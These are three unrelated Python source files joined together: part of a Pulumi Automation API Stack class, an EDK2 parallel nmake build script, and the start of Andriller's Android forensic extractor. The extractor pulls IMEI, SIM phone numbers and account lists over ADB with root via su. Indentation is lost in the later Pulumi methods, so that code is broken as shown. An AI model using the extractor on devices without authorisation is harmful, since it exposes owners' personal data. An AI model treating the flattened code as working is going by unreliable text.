        :param workspace: The Workspace the Stack was created from.
        :param mode: Whether to create, select, or create-or-select the stack.
        :raises TypeError: if any argument has the wrong type.
        """
        self.name = name
        self.workspace = workspace
        self._mode = mode
        if not isinstance(name, str):
            raise TypeError("name must be of type 'str'")
        if not isinstance(workspace, Workspace):
            raise TypeError("workspace must be of type 'Workspace'")
        if not isinstance(mode, StackInitMode):
            raise TypeError("mode must be of type 'StackInitMode'")
        # Perform the workspace-side create/select according to mode.
        if mode is StackInitMode.CREATE:
            workspace.create_stack(name)
        elif mode is StackInitMode.SELECT:
            workspace.select_stack(name)
        elif mode is StackInitMode.CREATE_OR_SELECT:
            try:
                workspace.create_stack(name)
            except StackAlreadyExistsError:
                workspace.select_stack(name)
    def __repr__(self):
        # Debug form: includes the init mode.
        return f"Stack(stack_name={self.name!r}, workspace={self.workspace!r}, mode={self._mode!r})"
    def __str__(self):
        # Display form: omits the init mode.
        return f"Stack(stack_name={self.name!r}, workspace={self.workspace!r})"
    def up(self,
           parallel: Optional[int] = None,
           message: Optional[str] = None,
           target: Optional[List[str]] = None,
           expect_no_changes: Optional[bool] = None,
           diff: Optional[bool] = None,
           target_dependents: Optional[bool] = None,
           replace: Optional[List[str]] = None,
           on_output: Optional[OnOutput] = None,
           on_event: Optional[OnEvent] = None,
           program: Optional[PulumiFn] = None) -> UpResult:
        """
        Creates or updates the resources in a stack by executing the program in the Workspace.
        https://www.pulumi.com/docs/reference/cli/pulumi_up/

        :param parallel: Parallel is the number of resource operations to run in parallel at once.
                         (1 for no parallelism). Defaults to unbounded (2147483647).
        :param message: Message (optional) to associate with the update operation.
        :param target: Specify an exclusive list of resource URNs to destroy.
        :param expect_no_changes: Return an error if any changes occur during this update.
        :param diff: Display operation as a rich diff showing the overall change.
        :param target_dependents: Allows updating of dependent targets discovered but not specified in the Target list.
        :param replace: Specify resources to replace.
        :param on_output: A function to process the stdout stream.
        :param on_event: A function to process structured events from the Pulumi event stream.
        :param program: The inline program.
        :returns: UpResult
        """
        # Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
        # pylint: disable=unused-argument
        program = program or self.workspace.program
        extra_args = _parse_extra_args(**locals())
        args = ["up", "--yes", "--skip-preview"]
        args.extend(extra_args)
        kind = ExecKind.LOCAL.value
        on_exit = None
        if program:
            # Inline program: host it behind a local gRPC language server and
            # point the CLI at it via --client.
            kind = ExecKind.INLINE.value
            server = grpc.server(futures.ThreadPoolExecutor(max_workers=4),  # pylint: disable=consider-using-with
                                 options=_GRPC_CHANNEL_OPTIONS)
            language_server = LanguageServer(program)
            language_pb2_grpc.add_LanguageRuntimeServicer_to_server(language_server, server)
            port = server.add_insecure_port(address="0.0.0.0:0")
            server.start()
            def on_exit_fn():
                language_server.on_pulumi_exit()
                server.stop(0)
            on_exit = on_exit_fn
            args.append(f"--client=127.0.0.1:{port}")
        args.extend(["--exec-kind", kind])
        log_watcher_thread = None
        temp_dir = None
        if on_event:
            # Stream structured engine events from a log file via a watcher thread.
            log_file, temp_dir = _create_log_file("up")
            args.extend(["--event-log", log_file])
            log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event))
            log_watcher_thread.start()
        try:
            up_result = self._run_pulumi_cmd_sync(args, on_output)
            outputs = self.outputs()
            summary = self.info()
            assert summary is not None
        finally:
            # Always tear down the watcher thread, temp dir, and language server.
            _cleanup(temp_dir, log_watcher_thread, on_exit)
        return UpResult(stdout=up_result.stdout, stderr=up_result.stderr, summary=summary, outputs=outputs)
    def preview(self,
                parallel: Optional[int] = None,
                message: Optional[str] = None,
                target: Optional[List[str]] = None,
                expect_no_changes: Optional[bool] = None,
                diff: Optional[bool] = None,
                target_dependents: Optional[bool] = None,
                replace: Optional[List[str]] = None,
                on_output: Optional[OnOutput] = None,
                on_event: Optional[OnEvent] = None,
                program: Optional[PulumiFn] = None) -> PreviewResult:
        """
        Performs a dry-run update to a stack, returning pending changes.
        https://www.pulumi.com/docs/reference/cli/pulumi_preview/

        :param parallel: Parallel is the number of resource operations to run in parallel at once.
                         (1 for no parallelism). Defaults to unbounded (2147483647).
        :param message: Message to associate with the preview operation.
        :param target: Specify an exclusive list of resource URNs to update.
        :param expect_no_changes: Return an error if any changes occur during this update.
        :param diff: Display operation as a rich diff showing the overall change.
        :param target_dependents: Allows updating of dependent targets discovered but not specified in the Target list.
        :param replace: Specify resources to replace.
        :param on_output: A function to process the stdout stream.
        :param on_event: A function to process structured events from the Pulumi event stream.
        :param program: The inline program.
        :returns: PreviewResult
        :raises RuntimeError: if no summary event appears in the event log.
        """
        # Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
        # pylint: disable=unused-argument
        program = program or self.workspace.program
        extra_args = _parse_extra_args(**locals())
        args = ["preview"]
        args.extend(extra_args)
        kind = ExecKind.LOCAL.value
        on_exit = None
        if program:
            # Inline program: host it behind a local gRPC language server.
            kind = ExecKind.INLINE.value
            server = grpc.server(futures.ThreadPoolExecutor(max_workers=4),  # pylint: disable=consider-using-with
                                 options=_GRPC_CHANNEL_OPTIONS)
            language_server = LanguageServer(program)
            language_pb2_grpc.add_LanguageRuntimeServicer_to_server(language_server, server)
            port = server.add_insecure_port(address="0.0.0.0:0")
            server.start()
            def on_exit_fn():
                language_server.on_pulumi_exit()
                server.stop(0)
            on_exit = on_exit_fn
            args.append(f"--client=127.0.0.1:{port}")
        args.extend(["--exec-kind", kind])
        # The event log is always captured here: the change summary returned
        # to the caller comes from the SummaryEvent in that log.
        log_file, temp_dir = _create_log_file("preview")
        args.extend(["--event-log", log_file])
        summary_events: List[SummaryEvent] = []
        def on_event_callback(event: EngineEvent) -> None:
            # Record the summary event, then forward everything to the caller.
            if event.summary_event:
                summary_events.append(event.summary_event)
            if on_event:
                on_event(event)
        # Start watching logs in a thread
        log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event_callback))
        log_watcher_thread.start()
        try:
            preview_result = self._run_pulumi_cmd_sync(args, on_output)
        finally:
            _cleanup(temp_dir, log_watcher_thread, on_exit)
        if not summary_events:
            raise RuntimeError("summary event never found")
        return PreviewResult(stdout=preview_result.stdout,
                             stderr=preview_result.stderr,
                             change_summary=summary_events[0].resource_changes)
    def refresh(self,
                parallel: Optional[int] = None,
                message: Optional[str] = None,
                target: Optional[List[str]] = None,
                expect_no_changes: Optional[bool] = None,
                on_output: Optional[OnOutput] = None,
                on_event: Optional[OnEvent] = None) -> RefreshResult:
        """
        Compares the current stack’s resource state with the state known to exist in the actual
        cloud provider. Any such changes are adopted into the current stack.

        :param parallel: Parallel is the number of resource operations to run in parallel at once.
                         (1 for no parallelism). Defaults to unbounded (2147483647).
        :param message: Message (optional) to associate with the refresh operation.
        :param target: Specify an exclusive list of resource URNs to refresh.
        :param expect_no_changes: Return an error if any changes occur during this update.
        :param on_output: A function to process the stdout stream.
        :param on_event: A function to process structured events from the Pulumi event stream.
        :returns: RefreshResult
        """
        # Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
        # pylint: disable=unused-argument
        # NOTE: _parse_extra_args consumes this frame's local names via **locals();
        # parameter names must match the keys it looks up — do not rename them.
        extra_args = _parse_extra_args(**locals())
        args = ["refresh", "--yes", "--skip-preview"]
        args.extend(extra_args)
        # Report whether an inline program or the plain CLI drives this operation.
        kind = ExecKind.INLINE.value if self.workspace.program else ExecKind.LOCAL.value
        args.extend(["--exec-kind", kind])
        log_watcher_thread = None
        temp_dir = None
        if on_event:
            # Stream structured engine events from a temp log file to the callback.
            log_file, temp_dir = _create_log_file("refresh")
            args.extend(["--event-log", log_file])
            log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event))
            log_watcher_thread.start()
        try:
            refresh_result = self._run_pulumi_cmd_sync(args, on_output)
        finally:
            # Always reap the watcher thread and the temp dir, even on failure.
            _cleanup(temp_dir, log_watcher_thread)
        summary = self.info()
        assert summary is not None
        return RefreshResult(stdout=refresh_result.stdout, stderr=refresh_result.stderr, summary=summary)
    def destroy(self,
                parallel: Optional[int] = None,
                message: Optional[str] = None,
                target: Optional[List[str]] = None,
                target_dependents: Optional[bool] = None,
                on_output: Optional[OnOutput] = None,
                on_event: Optional[OnEvent] = None) -> DestroyResult:
        """
        Destroy deletes all resources in a stack, leaving all history and configuration intact.

        :param parallel: Parallel is the number of resource operations to run in parallel at once.
                         (1 for no parallelism). Defaults to unbounded (2147483647).
        :param message: Message (optional) to associate with the destroy operation.
        :param target: Specify an exclusive list of resource URNs to destroy.
        :param target_dependents: Allows updating of dependent targets discovered but not specified in the Target list.
        :param on_output: A function to process the stdout stream.
        :param on_event: A function to process structured events from the Pulumi event stream.
        :returns: DestroyResult
        """
        # Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
        # pylint: disable=unused-argument
        # NOTE: _parse_extra_args consumes this frame's local names via **locals();
        # parameter names must match the keys it looks up — do not rename them.
        extra_args = _parse_extra_args(**locals())
        args = ["destroy", "--yes", "--skip-preview"]
        args.extend(extra_args)
        # Report whether an inline program or the plain CLI drives this operation.
        kind = ExecKind.INLINE.value if self.workspace.program else ExecKind.LOCAL.value
        args.extend(["--exec-kind", kind])
        log_watcher_thread = None
        temp_dir = None
        if on_event:
            # Stream structured engine events from a temp log file to the callback.
            log_file, temp_dir = _create_log_file("destroy")
            args.extend(["--event-log", log_file])
            log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event))
            log_watcher_thread.start()
        try:
            destroy_result = self._run_pulumi_cmd_sync(args, on_output)
        finally:
            # Always reap the watcher thread and the temp dir, even on failure.
            _cleanup(temp_dir, log_watcher_thread)
        summary = self.info()
        assert summary is not None
        return DestroyResult(stdout=destroy_result.stdout, stderr=destroy_result.stderr, summary=summary)
def get_config(self, key: str) -> ConfigValue:
"""
Returns the config value associated with the specified key.
:param key: The key for the config item to get.
:returns: ConfigValue
"""
return self.workspace.get_config(self.name, key)
def get_all_config(self) -> ConfigMap:
"""
Returns the full config map associated with the stack in the Workspace.
:returns: ConfigMap
"""
return self.workspace.get_all_config(self.name)
def set_config(self, key: str, value: ConfigValue) -> None:
"""
Sets a config key-value pair on the Stack in the associated Workspace.
:param key: The config key to add.
:param value: The config value to add.
"""
self.workspace.set_config(self.name, key, value)
def set_all_config(self, config: ConfigMap) -> None:
"""
Sets all specified config values on the stack in the associated Workspace.
:param config: A mapping of key to ConfigValue to set to config.
"""
self.workspace.set_all_config(self.name, config)
def remove_config(self, key: str) -> None:
"""
Removes the specified config key from the Stack in the associated Workspace.
:param key: The key to remove from config.
"""
self.workspace.remove_config(self.name, key)
def remove_all_config(self, keys: List[str]) -> None:
"""
Removes the specified config keys from the Stack in the associated Workspace.
:param keys: The keys to remove from config.
"""
self.workspace.remove_all_config(self.name, keys)
def refresh_config(self) -> None:
"""Gets and sets the config map used with the last update."""
self.workspace.refresh_config(self.name)
def outputs(self) -> OutputMap:
"""
Gets the current set of Stack outputs from the last Stack.up().
:returns: OutputMap
"""
return self.workspace.stack_outputs(self.name)
def history(self,
page_size: Optional[int] = None,
page: Optional[int] = None) -> List[UpdateSummary]:
"""
Returns a list summarizing all previous and current results from Stack lifecycle operations
(up/preview/refresh/destroy).
:param page_size: Paginate history entries (used in combination with page), defaults to all.
:param page: Paginate history entries (used in combination with page_size), defaults to all.
:returns: List[UpdateSummary]
"""
args = ["stack", "history", "--json", "--show-secrets"]
if page_size is not None:
# default page=1 when page_size is set
if page is None:
page = 1
args.extend(["--page-size", str(page_size), "--page", str(page)])
result = self._run_pulumi_cmd_sync(args)
summary_list = json.loads(result.stdout)
summaries: List[UpdateSummary] = []
for summary_json in summary_list:
summary = UpdateSummary(kind=summary_json["kind"],
start_time=datetime.strptime(summary_json["startTime"], _DATETIME_FORMAT),
message=summary_json["message"],
environment=summary_json["environment"],
config=summary_json["config"],
result=summary_json["result"],
end_time=datetime.strptime(summary_json["endTime"], _DATETIME_FORMAT),
version=summary_json["version"] if "version" in summary_json else None,
deployment=summary_json["Deployment"] if "Deployment" in summary_json else None,
resource_changes=summary_json["resourceChanges"] if "resourceChanges" in summary_json else None)
summaries.append(summary)
return summaries
def info(self) -> Optional[UpdateSummary]:
"""
Returns the current results from Stack lifecycle operations.
:returns: Optional[UpdateSummary]
"""
history = self.history(page_size=1)
if not history:
return None
return history[0]
def cancel(self) -> None:
"""
Cancel stops a stack's currently running update. It returns an error if no update is currently running.
Note that this operation is _very dangerous_, and may leave the stack in an inconsistent state
if a resource operation was pending when the update was canceled.
This command is not supported for local backends.
"""
self._run_pulumi_cmd_sync(["cancel", "--yes"])
def export_stack(self) -> Deployment:
"""
export_stack exports the deployment state of the stack.
This can be combined with Stack.import_state to edit a stack's state (such as recovery from failed deployments).
:returns: Deployment
"""
return self.workspace.export_stack(self.name)
def import_stack(self, state: Deployment) -> None:
"""
import_stack imports the specified deployment state into a pre-existing stack.
This can be combined with Stack.export_state to edit a stack's state (such as recovery from failed deployments).
:param state: The deployment state to import.
"""
return self.workspace.import_stack(self.name, state)
def _run_pulumi_cmd_sync(self,
args: List[str],
on_output: Optional[OnOutput] = None) -> CommandResult:
envs = {"PULUMI_DEBUG_COMMANDS": "true"}
if self.workspace.pulumi_home is not None:
envs = {**envs, "PULUMI_HOME": self.workspace.pulumi_home}
envs = {**envs, **self.workspace.env_vars}
additional_args = self.workspace.serialize_args_for_op(self.name)
args.extend(additional_args)
args.extend(["--stack", self.name])
result = _run_pulumi_cmd(args, self.workspace.work_dir, envs, on_output)
self.workspace.post_command_callback(self.name)
return result
def _parse_extra_args(**kwargs) -> List[str]:
extra_args: List[str] = []
message = kwargs.get("message")
expect_no_changes = kwargs.get("expect_no_changes")
diff = kwargs.get("diff")
replace = kwargs.get("replace")
target = kwargs.get("target")
target_dependents = kwargs.get("target_dependents")
parallel = kwargs.get("parallel")
if message:
extra_args.extend(["--message", message])
if expect_no_changes:
extra_args.append("--expect-no-changes")
if diff:
extra_args.append("--diff")
if replace:
for r in replace:
extra_args.extend(["--replace", r])
if target:
for t in target:
extra_args.extend(["--target", t])
if target_dependents:
extra_args.append("--target-dependents")
if parallel:
extra_args.extend(["--parallel", str(parallel)])
return extra_args
def fully_qualified_stack_name(org: str, project: str, stack: str) -> str:
    """
    Returns a stack name formatted with the greatest possible specificity:
    org/project/stack or user/project/stack

    Using this format avoids ambiguity in stack identity guards creating or selecting the wrong stack.
    Note that filestate backends (local file, S3, Azure Blob) do not support stack names in this
    format, and instead only use the stack name without an org/user or project to qualify it.
    See: https://github.com/pulumi/pulumi/issues/2522

    :param org: The name of the org or user.
    :param project: The name of the project.
    :param stack: The name of the stack.
    :returns: The fully qualified stack name.
    """
    return "/".join((org, project, stack))
def _create_log_file(command: str) -> Tuple[str, tempfile.TemporaryDirectory]:
log_dir = tempfile.TemporaryDirectory(prefix=f"automation-logs-{command}-") # pylint: disable=consider-using-with
filepath = os.path.join(log_dir.name, "eventlog.txt")
# Open and close the file to ensure it exists before we start polling for logs
with open(filepath, "w+"):
pass
return filepath, log_dir
def _watch_logs(filename: str, callback: OnEvent):
    """Tail `filename`, decoding each JSON line into an EngineEvent for `callback`.

    Polls every 100 ms while no new line is available and returns once the
    cancel event (the engine's final event) has been delivered.
    """
    with open(filename) as stream:
        while True:
            raw = stream.readline()
            if not raw:
                # Nothing new yet; poll again shortly.
                time.sleep(0.1)
                continue
            parsed = EngineEvent.from_json(json.loads(raw))
            callback(parsed)
            if parsed.cancel_event:
                break
def _cleanup(temp_dir: Optional[tempfile.TemporaryDirectory],
thread: Optional[threading.Thread],
on_exit_fn: Optional[Callable[[], None]] = None) -> None:
# If there's an on_exit function, execute it (used in preview/up to shut down server)
if on_exit_fn:
on_exit_fn()
# If we started a thread to watch logs, wait for it to terminate, timing out after 5 seconds.
if thread:
thread.join(5)
# If we created a temp_dir for the logs, clean up.
if temp_dir:
temp_dir.cleanup()
|
NmakeSubdirs.py | # @file NmakeSubdirs.py
# This script support parallel build for nmake in windows environment.
# It supports Python2.x and Python3.x both.
#
# Copyright (c) 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
#
# Import Modules
#
from __future__ import print_function
import argparse
import threading
import time
import os
import subprocess
import multiprocessing
import copy
import sys
__prog__ = 'NmakeSubdirs'
__version__ = '%s Version %s' % (__prog__, '0.10 ')
__copyright__ = 'Copyright (c) 2018, Intel Corporation. All rights reserved.'
__description__ = 'Replace for NmakeSubdirs.bat in windows ,support parallel build for nmake.\n'
cpu_count = multiprocessing.cpu_count()
output_lock = threading.Lock()
def RunCommand(WorkDir=None, *Args, **kwargs):
    """Run an external command in WorkDir, echo its combined output, and
    return (returncode, stdout).

    :param WorkDir: directory to run the command in; defaults to the current dir.
    :param Args: the command and its arguments.
    :param kwargs: may override "stdout"/"stderr" passed to subprocess.Popen.
    :raises RuntimeError: if the command exits with a non-zero status.
    """
    if WorkDir is None:
        WorkDir = os.curdir
    # Default to capturing stdout with stderr folded into it.
    if "stderr" not in kwargs:
        kwargs["stderr"] = subprocess.STDOUT
    if "stdout" not in kwargs:
        kwargs["stdout"] = subprocess.PIPE
    p = subprocess.Popen(Args, cwd=WorkDir, stderr=kwargs["stderr"], stdout=kwargs["stdout"])
    stdout, stderr = p.communicate()
    message = ""
    if stdout is not None:
        message = stdout.decode(encoding='utf-8', errors='ignore')  # for compatibility in python 2 and 3
    if p.returncode != 0:
        # "directory" typo fixed in the error text.
        raise RuntimeError("Error while execute command \'{0}\' in directory {1}\n{2}".format(" ".join(Args), WorkDir, message))
    # Context manager guarantees the lock is released even if print raises,
    # and keeps parallel builds from interleaving their output.
    with output_lock:
        print("execute command \"{0}\" in directory {1}".format(" ".join(Args), WorkDir))
        print(message)
    return p.returncode, stdout
class TaskUnit(object):
    """A deferred call: a function plus the positional/keyword arguments to
    invoke it with. Tasks compare (and hash) by identity, so two tasks built
    from identical arguments are still distinct queue entries."""

    def __init__(self, func, args, kwargs):
        self.func = func
        self.args = args
        self.kwargs = kwargs

    def __eq__(self, other):
        # Identity comparison: a task is only equal to itself.
        return self is other

    # Defining __eq__ would otherwise set __hash__ to None and make tasks
    # unhashable; keep the default identity hash, consistent with __eq__.
    __hash__ = object.__hash__

    def run(self):
        """Invoke the wrapped function and return its result."""
        return self.func(*self.args, **self.kwargs)

    def __str__(self):
        # str() each positional argument: ",".join requires strings and the
        # original raised TypeError for any non-string argument.
        para = [str(arg) for arg in self.args]
        para.extend("{0}={1}".format(k, v) for k, v in self.kwargs.items())
        return "{0}({1})".format(self.func.__name__, ",".join(para))
class ThreadControl(object):
    """A fixed-size pool of worker threads draining a shared pending-task list.

    Usage: addTask(...) repeatedly, then startSchedule(); waitComplete() joins
    the scheduler thread. The first task that raises RuntimeError sets
    self.error/self.errorMsg and stops all workers.
    """
    def __init__(self, maxthread):
        # maxthread: number of worker threads to spawn.
        self._processNum = maxthread
        self.pending = []          # tasks not yet started (guarded by pendingLock)
        self.running = []          # live worker threads (guarded by runningLock)
        self.pendingLock = threading.Lock()
        self.runningLock = threading.Lock()
        self.error = False         # set once by the first failing task
        self.errorLock = threading.Lock()
        self.errorMsg = "errorMsg"
    def addTask(self, func, *args, **kwargs):
        # Queue a deferred call; only safe before startSchedule() is invoked.
        self.pending.append(TaskUnit(func, args, kwargs))
    def waitComplete(self):
        # Block until the scheduler thread (and thus all workers) has finished.
        self._schedule.join()
    def startSchedule(self):
        # Run the scheduler on its own thread so the caller is not blocked.
        self._schedule = threading.Thread(target=self.Schedule)
        self._schedule.start()
    def Schedule(self):
        """Spawn the worker threads, then poll until all of them have exited."""
        for i in range(self._processNum):
            task = threading.Thread(target=self.startTask)
            task.daemon = False
            self.running.append(task)
        self.runningLock.acquire(True)
        for thread in self.running:
            thread.start()
        self.runningLock.release()
        # Workers remove themselves from self.running when done.
        while len(self.running) > 0:
            time.sleep(0.1)
        if self.error:
            print("subprocess not exit sucessfully")
            print(self.errorMsg)
    def startTask(self):
        """Worker loop: pop and run pending tasks until the queue is empty or an error is flagged."""
        while True:
            if self.error:
                break
            self.pendingLock.acquire(True)
            if len(self.pending) == 0:
                self.pendingLock.release()
                break
            task = self.pending.pop(0)
            self.pendingLock.release()
            try:
                task.run()
            except RuntimeError as e:
                # First failure wins: record the message and stop this worker.
                if self.error: break
                self.errorLock.acquire(True)
                self.error = True
                self.errorMsg = str(e)
                time.sleep(0.1)
                self.errorLock.release()
                break
        # Deregister so Schedule()'s polling loop can terminate.
        self.runningLock.acquire(True)
        self.running.remove(threading.currentThread())
        self.runningLock.release()
def Run():
    """Build every subdir with nmake: sequentially for a single job,
    otherwise through a ThreadControl worker pool. Exits with status 1
    on the first failure. Reads the module-level `args` namespace."""
    root = os.path.abspath(os.curdir)
    # A single subdir gains nothing from parallelism.
    if len(args.subdirs) == 1:
        args.jobs = 1
    if args.jobs == 1:
        # Serial mode: stream nmake output straight to our stdout.
        try:
            for subdir in args.subdirs:
                RunCommand(os.path.join(root, subdir), "nmake", args.target,
                           stdout=sys.stdout, stderr=subprocess.STDOUT)
        except RuntimeError:
            exit(1)
        return
    # Parallel mode: queue one nmake task per subdir and let the pool drain it.
    controller = ThreadControl(args.jobs)
    for subdir in args.subdirs:
        controller.addTask(RunCommand, os.path.join(root, subdir), "nmake", args.target)
    controller.startSchedule()
    controller.waitComplete()
    if controller.error:
        exit(1)
if __name__ == "__main__":
    # Build the CLI: positional nmake target + one or more subdirs; --jobs
    # defaults to the CPU count. 'resolve' lets later option definitions
    # override earlier conflicting ones.
    parser = argparse.ArgumentParser(prog=__prog__, description=__description__ + __copyright__, conflict_handler='resolve')
    parser.add_argument("target", help="the target for nmake")
    parser.add_argument("subdirs", nargs="+", help="the relative dir path of makefile")
    parser.add_argument("--jobs", type=int, dest="jobs", default=cpu_count, help="thread number")
    parser.add_argument('--version', action='version', version=__version__)
    # `args` is intentionally module-level: Run() reads it as a global.
    args = parser.parse_args()
    Run()
|
driller.py | import os
import re
import time
import shutil
import logging
import tarfile
import pathlib
import tempfile
import webbrowser
import threading
from contextlib import suppress
from timeout_decorator.timeout_decorator import TimeoutError
from . import utils
from . import engines
from . import messages
from . import decoders
from . import adb_conn
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
class ChainExecution:
    """Orchestrates a full Android extraction run: device probing over ADB,
    data acquisition (root pull or `adb backup`), artefact decoding, and
    HTML/XLSX report generation. Results accumulate in REPORT/DECODED/DOWNLOADS.
    """
    # Permission levels reported for the connected device.
    USER = 'shell'
    ROOT = 'root'
    ROOTSU = 'root-su'
    # Name of the tar archive that collects every downloaded artefact.
    DATA_STORE = 'DataStore.tar'
    # Subdirectory of work_dir where extracted files are written.
    extract_dir = 'data'
    def __init__(self, base_dir, status_msg=None, use_adb=False, **kwargs):
        # status_msg: optional Tk StringVar-like object used for UI progress updates.
        self.tools = utils.DrillerTools()
        self.base_dir = base_dir
        self.work_dir = None
        self.updater = status_msg
        if use_adb:
            self.adb = adb_conn.ADBConn()
        self.registry = decoders.Registry()
        self.targets = None
        self.REPORT = {}        # device metadata for the report header
        self.DECODED = []       # [html_report_path, title] pairs per decoder
        self.DOWNLOADS = []     # file names pulled/extracted this run
        self.DataStore = None
        self.do_shared = kwargs.get('do_shared', False)
        self.backup = kwargs.get('backup')
        # self.backup_pw = kwargs.get('backup_pw')  # TODO
        self.tarfile = kwargs.get('tarfile')
        self.src_dir = kwargs.get('src_dir')
        self.WB = None          # master XLSX workbook, created lazily
        self.logger = kwargs.get('logger', logger)
    def setup(self):
        """Create the output directory and open the DataStore tar for appending."""
        if not os.path.exists(self.output_dir):
            os.makedirs(self.output_dir)
        data_store = os.path.join(self.work_dir, self.DATA_STORE)
        self.DataStore = tarfile.open(data_store, 'a')
    def CleanUp(self):
        """Close and hash the DataStore, drop any temp tar, and report completion."""
        self.DataStore.close()
        datastore_file = os.path.abspath(self.DataStore.fileobj.name)
        utils.hash_file(datastore_file)
        # Delete temp tar file
        default_temp = tempfile.gettempdir()
        tf = self.tarfile
        if tf and os.path.isfile(tf) and tf.startswith(default_temp):
            os.remove(tf)
        self.update('Finished.')
    def update(self, msg, info=True):
        """Log a progress message and mirror it to the UI updater if present."""
        self.logger.info(msg) if info else logger.debug(msg)
        if self.updater:
            self.updater.set(msg)
            self.updater._root.update()
    def InitialAdbRead(self):
        """Probe the connected device over ADB and populate self.REPORT
        (serial, permissions, build props, wifi MAC, IMEI, time, SIM, accounts).
        Each probe is wrapped in suppress(TimeoutError) so a slow device
        only skips that field."""
        self.update('Reading information...')
        def get_permission():
            # Determine shell privilege: plain root, root via `su`, or user.
            self.su = False
            if 'root' in self.adb('exec-out id'):
                self.permisson = self.ROOT
                return self.permisson
            try_su = self.adb('exec-out id', su=True)
            if try_su is not None and self.ROOT in try_su:
                self.permisson = self.ROOTSU
                self.su = True
            else:
                self.permisson = self.USER
            return self.permisson
        def get_prop(prop: list, key: str):
            # Return the value of the first `key=value` line containing `key`.
            for row in prop:
                if key in row:
                    return row.strip().split('=')[1]
        def get_wifi(dump: list):
            # Extract the MAC address from the `mWifiInfo` line of dumpsys wifi.
            dump = list(filter(lambda x: x.startswith('mWifiInfo'), dump))
            if dump:
                src = re.search(r'MAC: ([:0-9a-f]{17}),', dump[0])
                if src:
                    return src.groups()[0]
        def get_accounts(dump):
            # Parse `Account {name=..., type=...}` entries into (type, name) pairs.
            accs = re.findall(r'Account \{name=(.+?), type=(.+?)\}', dump, re.S)
            return [(v, k) for k, v in accs]
        # Serial, status, permissions
        self.REPORT['serial'], self.REPORT['status'] = self.adb.device()
        self.REPORT['permisson'] = get_permission()
        # Build Props
        with suppress(TimeoutError):
            build_prop = self.adb('exec-out cat /system/build.prop', su=self.su, timeout=5)
            if build_prop:
                build_prop = build_prop.split('\n')
                props = [
                    'ro.product.manufacturer',
                    'ro.product.model',
                    'ro.build.version.release',
                    'ro.build.display.id']
                for p in props:
                    self.REPORT[p] = get_prop(build_prop, p)
        # WIFI
        with suppress(TimeoutError):
            _wifi = self.adb('exec-out dumpsys wifi', timeout=5)
            if _wifi:
                self.REPORT['wifi mac'] = get_wifi(_wifi.split('\n'))
        # IMEI
        with suppress(TimeoutError):
            _usbinfo = self.adb('exec-out dumpsys iphonesubinfo', timeout=5)
            if _usbinfo:
                self.REPORT['imei'] = get_prop(_usbinfo.split('\n'), 'Device ID')
        # IMEI for Android v6+
        # with suppress(TimeoutError):
        #     rex = re.compile(b' ([0-9a-f]{8})')
        #     _data = self.adb('adb shell service call iphonesubinfo 1', timeout=2)
        #     if _data and len(_data) > 9:
        #         plen = int(b''.join(_data[:2]), 16)
        # Time
        with suppress(TimeoutError):
            self.REPORT['local_time'] = time.strftime('%Y-%m-%d %H:%M:%S %Z')
            rtime = self.adb(['shell', 'date', r'+%F\ %T\ %Z'], timeout=5)
            # breakpoint()
            self.REPORT['device_time'] = rtime.split(self.adb.rmr.decode())[-1]
        # SIM Card
        with suppress(TimeoutError, Exception):
            if self.adb.exists('/data/system/SimCard.dat'):
                _simdat = self.adb('exec-out cat /data/system/SimCard.dat', su=self.su, timeout=5)
                sims = [
                    'CurrentSimSerialNumber',
                    'CurrentSimPhoneNumber',
                    'CurrentSimOperatorName',
                    'PreviousSimSerialNumber',
                    'PreviousSimPhoneNumber']
                if _simdat:
                    _simdat = _simdat.split('\n')
                    for s in sims:
                        self.REPORT[s] = get_prop(_simdat, s)
        # Accounts
        with suppress(TimeoutError):
            _acc = self.adb('exec-out dumpsys account', timeout=5)
            self.REPORT['accounts'] = get_accounts(_acc)
    @staticmethod
    def clean_name(value):
        # Strip whitespace and filesystem-unfriendly characters from a name.
        return re.sub(r'[\s\/:*?"<>|]', '', value)
    def CreateWorkDir(self):
        """Build a timestamped work directory from device make/model (falling back
        to a generic name), then call setup()."""
        date_ = time.strftime('%Y-%m-%d')
        time_ = time.strftime('%H.%M.%S')
        try:
            self.work_dir = os.path.join(
                self.base_dir,
                '{}_{}_{}_{}'.format(
                    self.clean_name(
                        self.REPORT.get('ro.product.manufacturer', self.REPORT['serial'])),
                    self.clean_name(
                        self.REPORT.get('ro.product.model', self.REPORT['permisson'])),
                    date_, time_,))
        except Exception:
            self.work_dir = os.path.join(self.base_dir, f'andriller_extraction_{date_}_{time_}')
        self.output_dir = os.path.join(self.base_dir, self.work_dir, self.extract_dir)
        self.logger.debug(f'work_dir:{self.work_dir}')
        self.logger.debug(f'output_dir:{self.output_dir}')
        self.setup()
    def download_file(self, file_path):
        """
        Return values:
        True = file downloaded
        False = file does not exist, or failed to get in full size
        None = file exists but has no size
        """
        file_remote = self.adb.exists(file_path, su=self.su)
        if file_remote:
            file_name = os.path.basename(file_remote)
            file_local = os.path.join(self.output_dir, file_name)
            remote_size = self.adb.get_size(file_path, su=self.su)
            file_saveas = os.path.join(
                os.path.split(file_local)[0],
                os.path.split(file_remote)[1])
            if remote_size == 0:
                return None
            self.logger.info(f'{file_remote} ({remote_size} bytes)')
            if self.permisson == self.ROOT:
                # Direct `adb pull` is available with plain root.
                self.adb.pull_file(file_path, file_local)
                if os.path.exists(file_local):
                    self.DataStore.add(file_saveas, file_remote)
                    self.DOWNLOADS.append(file_name)
                    return True
            elif self.permisson == self.ROOTSU:
                # Pull via `su cat`, retrying until the size matches.
                # NOTE(review): indentation reconstructed — the warning branch is
                # read as the for/else (all retries exhausted); confirm upstream.
                for _ in range(100):
                    file_obj = self.adb.get_file(file_path, su=self.su)
                    if file_obj:
